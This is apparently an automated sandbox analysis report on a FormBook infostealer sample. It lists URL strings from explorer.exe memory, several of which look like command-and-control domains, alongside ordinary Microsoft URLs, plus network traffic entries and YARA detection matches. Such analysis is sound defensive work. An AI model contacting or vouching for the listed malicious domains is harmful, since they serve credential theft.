Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mmarketing.xyz/a03d/www.1fuli9902.shop
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mmarketing.xyzReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ome-renovation-86342.bond
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ome-renovation-86342.bond/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ome-renovation-86342.bond/a03d/www.ategorie-polecane-831.buzz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ome-renovation-86342.bondReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oonlightshadow.shop
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oonlightshadow.shop/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oonlightshadow.shop/a03d/www.eepvid.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oonlightshadow.shopReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.orld-visa-center.online
Source: explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.orld-visa-center.online/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.orld-visa-center.onlineReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info/a03d/www.kkkk.shop
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.infoReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.romatografia.online
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.romatografia.online/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.romatografia.online/a03d/www.ome-renovation-86342.bond
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.romatografia.onlineReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.voyagu.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.voyagu.info/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.voyagu.info/a03d/www.orld-visa-center.online
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.voyagu.infoReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yselection.xyz
Source: explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yselection.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yselection.xyzReferer:
Source: explorer.exe, 0000000A.00000000.1505638874.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271435377.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000A.00000000.1505638874.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.00000000092D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.00000000092D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001A.00000002.3123251512.00000000092D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.00000000092D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/U
Source: explorer.exe, 0000000A.00000002.2465635180.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009103000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2574704778.0000000009103000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000002.2465635180.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1505638874.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.000000000923A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.000000000919F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.000000000919A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.000000000919F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000002.2462603390.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 0000000A.00000000.1505638874.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004C27000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2576238809.0000000004C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 0000000A.00000002.2473557488.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1509179829.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.000000000923A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 0000000A.00000002.2473557488.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1509179829.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000001A.00000003.2566723323.000000000923A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comerUser
Source: explorer.exe, 0000000A.00000002.2473557488.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1509179829.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000001A.00000003.2566723323.0000000009336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer3
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000A.00000003.2272841023.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1505638874.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2466417228.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000A.00000002.2473557488.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1509179829.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000001A.00000003.2566723323.000000000923A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comCEK
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
